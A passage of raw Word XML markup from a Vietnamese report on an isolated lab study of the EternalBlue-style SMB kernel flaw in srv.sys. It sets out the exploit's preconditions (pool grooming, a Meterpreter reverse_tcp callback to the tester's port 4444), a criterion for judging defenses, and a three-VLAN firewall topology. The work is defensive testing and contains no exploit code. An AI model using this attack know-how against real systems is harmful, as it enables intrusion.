        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>$V$ (Vulnerable Implementation State):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tồn tại khiếm khuyết trong logic xử lý của hệ điều hành. Driver nhân </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chưa được cập nhật bản vá an ninh, chứa lỗi tính toán sai lệch kích thước danh sách thuộc tính mở rộng (FEA) trong hàm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SrvOs2FeaListSizeToNt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [3], [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B57039" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>$E$ (Exploit Execution Success):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quá trình bố trí bộ nhớ và chuyển hướng thực thi thành công. Thao tác sắp xếp Non-Paged Pool (Pool Grooming) hoàn tất, lỗi tràn bộ đệm ghi đè chính xác cấu trúc điều khiển mà không làm hỏng cấu trúc danh sách liên kết của pool hoặc gây lỗi dừng hệ thống (BSOD) [3], [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329EF42E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>$C$ (Callback / Reverse Channel Establishment):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khả năng thiết lập kênh liên lạc ngược. Payload thực thi trong không gian nhân khởi tạo thành công kết nối TCP ngược trở lại máy kiểm thử (khi sử dụng kiến trúc payload Reverse Connection) [5], [6].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A4867" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Nguyên lý bẻ gãy phòng thủ (Defense Breakpoint):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Một giải pháp phòng thủ chỉ được công nhận có hiệu lực khi và chỉ khi chứng minh được nó đã chuyển đổi ít nhất một tiền điều kiện cần thiết trong chuỗi từ giá trị </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\text{True} \to \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t>. Không được kết luận một biện pháp phòng thủ thành công chỉ dựa trên hiện tượng exploit thất bại, bởi exploit thất bại có thể bắt nguồn từ sự mất ổn định của kernel pool thay vì hiệu lực của biện pháp bảo vệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00885A09" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2. THIẾT KẾ KIẾN TRÚC MẠNG LAB DOANH NGHIỆP MÔ PHỎNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2AABE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.2.1. Cấu trúc mạng phân đoạn 3 VLAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8CF997" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mô hình thực nghiệm mô phỏng kiến trúc mạng phân đoạn tiêu chuẩn của doanh nghiệp, thay thế hoàn toàn cấu trúc mạng phẳng (Flat Network) đơn giản. Kiến trúc bao gồm một thiết bị Tường lửa/UTM ảo làm trung tâm điều phối, kết nối xuống thiết bị chuyển mạch Core Switch Layer 2 và phân tách thành ba mạng ảo (VLAN) độc lập [2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FEE88" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VLAN 10 – Server Subnet (`192.168.10.0/24`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697EC34D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Phân vùng máy chủ nội bộ. Chứa máy chủ mục tiêu Windows 7 SP1 x64 đóng vai trò máy chủ chia sẻ tệp SMB (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F175064" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VLAN 20 – Pentest Subnet (`192.168.20.0/24`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73E9FC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Phân vùng dành riêng cho trạm kiểm thử an ninh. Chứa máy kiểm thử Kali Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.20.10</w:t>
      </w:r>
      <w:r>
        <w:t>), mô phỏng vị trí của một máy trạm bị thỏa hiệp hoặc phân vùng kiểm thử chuyên trách.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E46AB4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VLAN 30 – User Subnet (`192.168.30.0/24`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE1C23" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Phân vùng người dùng văn phòng hợp lệ. Chứa máy trạm Windows Client (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.30.50</w:t>
      </w:r>
      <w:r>
        <w:t>), đóng vai trò là trạm đối chứng nghiệp vụ dương tính (Positive Business Control).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA2CA7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.2.2. Nguyên lý Inter-VLAN Routing và Firewall Inspection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBFD682" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cơ chế định tuyến và kiểm soát lưu lượng được thiết kế theo các nguyên tắc mạng doanh nghiệp nghiêm ngặt [2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95433E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Firewall là điểm định tuyến duy nhất (Single Routing Point):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Thiết bị Tường lửa/UTM (sử dụng pfSense, OPNsense hoặc VyOS) đóng vai trò là Default Gateway của cả ba VLAN (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.20.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.30.1</w:t>
      </w:r>
      <w:r>
        <w:t>). Mọi lưu lượng truyền thông giữa các VLAN (Inter-VLAN traffic) bắt buộc phải đi qua tường lửa để kiểm tra chính sách (Stateful Inspection) và ghi nhận nhật ký (Firewall Logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624191D7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Chính sách kiểm soát phiên hai chiều (Stateful Inspection &amp; Reverse Channel Policy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884C9BD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Chiều Inbound (VLAN 20 $\to$ VLAN 10):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tại các trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_0, S_1, S_2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Firewall cho phép lưu lượng TCP tới cổng 139 và 445 của máy chủ mục tiêu. Tại trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_3</w:t>
      </w:r>
      <w:r>
        <w:t>, quy tắc này chuyển sang chế độ từ chối và ghi nhật ký (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Block &amp; Log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), bẻ gãy tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ngay tại cửa ngõ vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C08F6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Chiều Outbound / Egress (VLAN 10 $\to$ VLAN 20):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Do payload khai thác Meterpreter sử dụng kiến trúc kết nối ngược (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t>), máy mục tiêu sau khi bị chèn shellcode sẽ chủ động khởi tạo phiên TCP ra ngoài hướng về trạm kiểm thử (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.20.10:4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_0, S_1, S_2</w:t>
      </w:r>
      <w:r>
        <w:t>, Firewall được cấu hình chính sách cho phép lưu lượng thử nghiệm có kiểm soát từ VLAN 10 sang cổng 4444 của VLAN 20 nhằm đo lường khả năng thiết lập kênh liên lạc ngược (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Khi bước sang trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_3</w:t>
      </w:r>
      <w:r>
        <w:t>, do gói tin tấn công ban đầu bị chặn ngay tại chiều vào (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), mã độc không được kích hoạt trên máy chủ, dẫn đến kênh kết nối ngược </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tự động bị vô hiệu hóa từ gốc rễ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F30B323" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Core Switch thuần Layer 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Thiết bị chuyển mạch Core Switch chỉ thực hiện chức năng chuyển mạch và truyền tải các đường trung kế (802.1Q Trunking), hoàn toàn không bật tính năng định tuyến IP (Layer 3 Switching bị tắt). Điều này ngăn chặn việc các gói tin đi tắt qua switch mà bỏ qua tường lửa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A552386" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Không kết nối Internet thật:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Phía ngoài tường lửa được kết nối tới một mạng diện rộng mô phỏng (Simulated WAN: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>172.16.0.0/24</w:t>
      </w:r>
      <w:r>
        <w:t>) phục vụ kiểm thử các kịch bản định tuyến biên, hoàn toàn cách ly với card mạng vật lý của máy chủ chủ quản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40B567" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.2.3. Sơ đồ Topo mạng kiến trúc doanh nghiệp mô phỏng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C1593" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sơ đồ 2.1 mô tả chi tiết kiến trúc kết nối và phân bổ phân vùng mạng trong môi trường thực nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="7791CA2E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2354641F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-------------------------------------------------------------------------+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                  MẠNG DOANH NGHIỆP MÔ PHỎNG (ENTERPRISE LAB)            |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                                                         |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  [SIMULATED WAN: 172.16.0.0/24] (Cô lập hoàn toàn, không Internet thật) |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                 |                                       |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                 v (WAN Interface: 172.16.0.2)           |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +-------------------------------------------------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |                 FIREWALL / UTM APPLIANCE (pfSense / VyOS)         |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |   - Điểm duy nhất thực hiện Inter-VLAN Routing                    |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |   - Default Gateway: .10.1 (VLAN 10), .20.1 (VLAN 20), .30.1 (VLAN30)|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |   - Điểm thực thi chính sách lọc gói &amp; Stateful Inspection        |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +-----------------------------------+-------------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                      |                                  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                      | Trunk 802.1Q (VLAN 10, 20, 30)   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                                      v                                  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>|  +-------------------------------------------------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |               CORE SWITCH LAYER 2 (802.1Q Switching Only)         |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  |               (Không định tuyến L3, chỉ trunking và access)       |  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|  +-------------------+---------------+-------------------------------+  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                      |               |               |                  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|        Access VLAN 10|  Access VLAN 20|  Access VLAN 30|                 |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|                      v               v               v                  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             +----------------+ +---------------+ +------------------+   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|             | SERVER SUBNET  | |PENTEST SUBNET | | USER SUBNET      |   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
